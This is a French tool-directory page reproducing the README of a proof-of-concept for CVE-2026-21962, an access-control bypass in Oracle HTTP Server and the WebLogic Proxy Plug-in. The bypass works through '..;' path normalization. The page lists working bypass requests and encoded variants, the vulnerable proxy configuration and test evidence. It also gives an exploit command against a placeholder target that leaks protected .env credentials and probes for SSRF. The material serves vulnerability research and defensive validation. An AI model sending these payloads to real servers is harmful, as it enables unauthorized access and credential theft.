Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-21962 — PoC vérifié et analyse pour CVE-2026-21962, un contournement du contrôle d'accès dans Oracle HTTP Server/WebLogic Proxy Plug-in via une incohérence de normalisation d'URI, avec script d'exploitation et preuves. | Kitploit
Outils/GitHubGitHub/zeetee1235/cve-2026-21962
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionRed Teaming
GitHubzeetee1235/cve-2026-21962

CVE-2026-21962

PoC vérifié et analyse pour CVE-2026-21962, un contournement du contrôle d'accès dans Oracle HTTP Server/WebLogic Proxy Plug-in via une incohérence de normalisation d'URI, avec script d'exploitation et preuves.

Voir le dépôt
315il y a 20 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-21962 — Oracle HTTP Server / WebLogic Server Proxy Plug-in

Contournement du contrôle d'accès via incohérence de normalisation d'URI

Une exploitation et une analyse reproduites indépendamment pour CVE-2026-21962 (contrôle d'accès inapproprié, CVSS 10.0) dans Oracle HTTP Server / le Proxy Plug-in Oracle WebLogic Server pour Apache HTTP Server.

Statut : vérifié contre OHS 12.2.1.4.0 et 14.1.2.0.0 en frontal de WebLogic Server 12.2.1.4.


1. TL;DR

Le frontal (OHS + mod_wl_ohs) et le backend (WebLogic) normalisent ..; différemment. Une requête comme :

root@kitploit:~
GET /foo/..;/internal-admin/cont/.env HTTP/1.1

contourne une règle de protection frontale <Location /internal-admin> car OHS ne réduit pas ..;, tandis que WebLogic ( = paramètre de chemin servlet, = parent). Le backend sert alors le chemin protégé. Résultat : (CWE-284).

le fait
;
..
contournement du contrôle d'accès frontal

Voir analysis/root-cause.md.

2. Périmètre — exactement ce qui a été vérifié

Vérifié (reproduit)

  • OHS 12.2.1.4.0 + mod_wl_ohs (WLSPLUGINS_12.2.1.4.0_LINUX.X64_190912.1848) en frontal de WebLogic Server 12.2.1.4.
  • OHS 14.1.2.0.0 + mod_wl_ohs (WLSPLUGINS_14.1.2.0.0_LINUX.X64_250908.1137) en frontal de WebLogic Server 12.2.1.4.
  • Variantes de contournement (toutes divulguent le .env protégé) :
    • /foo/..;/internal-admin/cont/.env
    • /foo/..%3b/internal-admin/cont/.env
    • /foo/..;jsessionid=xxxx/internal-admin/cont/.env
    • /foo/%2e%2e;/internal-admin/cont/.env
  • Le chemin direct (canonique) est bloqué (404), ce qui prouve le contournement.
  • La réponse comporte des en-têtes X-ORACLE-DMS-*, ce qui prouve qu'il s'agit d'une réponse authentique du backend (WebLogic).
  • Le journal d'accès du backend montre la requête normalisée en /internal-admin/... (GET /foo/../internal-admin/... 200).
  • A/B équivalent au correctif : avec la normalisation frontale corrigée, la même requête est bloquée (voir evidence/).
  • Les URI « RCE » de la famille Ashwesker renvoient 404 sur le même déploiement vulnérable (voir poc-factcheck.md).

NON vérifié

  • WebLogic Server Proxy Plug-in pour IIS (isapi_wl, affecté en 12.2.1.4.0). Le même mécanisme est attendu (résolution du chemin servlet sur le backend), mais il n'a pas été reproduit sous Windows.
  • Les binaires officiels corrigés (sous SSO Oracle). L'analyse du correctif est une comparaison binaire de deux builds vulnérables publics + une démonstration équivalente au correctif (analysis/patch-analysis.md).
  • Toute chaîne RCE au-delà de la divulgation de données / SSRF. Ce projet démontre un contournement du contrôle d'accès avec fuite de données et un scénario d'amorçage SSRF ; il ne démontre pas l'exécution de commandes OS, et aucun PoC public crédible ne le fait non plus.

3. Environnement

rôlecomposantversion
frontalOracle HTTP Server12.2.1.4.0 / 14.1.2.0.0
plug-inmod_wl_ohs12.2.1.4 (190912) / 14.1.2 (250908)
backendOracle WebLogic Server12.2.1.4
application protégée/internal-admin/cont/.env (identifiants fictifs)—

Configuration frontale utilisée (déclencheur minimal) :

root@kitploit:~
<Location /foo>
  WLSRequest ON
  WebLogicCluster <backend>:7101
</Location>

<Location /internal-admin>
  ErrorDocument 404 'OHS: Disallowed location'
  Redirect 404 /
</Location>

4. Vulnérable vs Corrigé (A/B)

Même requête, même frontal, même backend — seule la gestion de ..; par le frontal est modifiée.

root@kitploit:~
GET /foo/..;/internal-admin/cont/.env HTTP/1.1
déploiementHTTPfuitebackend atteint
vulnérable200oui (identifiants .env)oui (X-ORACLE-DMS-*)
corrigé (normalisation corrigée)404nonnon

Preuves brutes (requête / réponse / journaux serveur) :

  • evidence/vulnerable/
  • evidence/patched/

5. Utilisation

root@kitploit:~
python3 exploit/CVE-2026-21962.py -t http://TARGET:PORT --auto-proxy --check ALL
  • --auto-proxy : détection automatique du préfixe proxy WLSRequest (ex. /foo).
  • -c : chemin protégé sur le backend (défaut internal-admin/cont/.env).
  • --check LEAK|SSRF|ALL.
  • La vérification de la réponse backend utilise les en-têtes X-ORACLE-DMS-* ; la requête de contrôle (directe) doit être bloquée pour que le verdict soit positif.

Voir exploit/README.md pour les détails. À utiliser uniquement contre des systèmes que vous êtes autorisé à tester.

6. Fichiers

root@kitploit:~
.
├── README.md                     ce fichier
├── exploit/
│   ├── CVE-2026-21962.py         PoC vérifié (vérification de fuite déterministe)
│   └── README.md
├── evidence/
│   ├── vulnerable/               request.txt, response.txt, server-log.txt
│   └── patched/                  request.txt, response.txt, server-log.txt
├── analysis/
│   ├── root-cause.md             analyse de l'incohérence de normalisation
│   └── patch-analysis.md         comparaison binaire + A/B équivalent au correctif
└── poc-factcheck.md              tableau de crédibilité des PoC publics + détail par PoC

L'outillage de détection / cartographie active (empreinte, sonde aveugle, carte de normalisation) qui fonctionne SANS connaître un chemin protégé est conservé séparément dans ../../probe/.

Intégrité

  • exploit/CVE-2026-21962.py SHA-256 : 20f050abf2a8f0e5b644667c1f7f87bcd9b2448d03b8d5d89bd6ea71b6b4f75a

7. Références

  • Oracle CPU (janv. 2026) : https://www.oracle.com/security-alerts/cpujan2026.html
  • NVD : https://nvd.nist.gov/vuln/detail/CVE-2026-21962
  • CISA KEV : https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-21962
  • Chercheur d'origine : https://github.com/gregk4sec/cve-2026-21962

8. Utilisation responsable

Ce matériel est fourni pour la recherche en vulnérabilité et la validation défensive. Ne pas utiliser contre des systèmes sans autorisation. Le contenu .env dans les preuves est fictif ; aucun identifiant réel n'est inclus.

Télécharger l’outil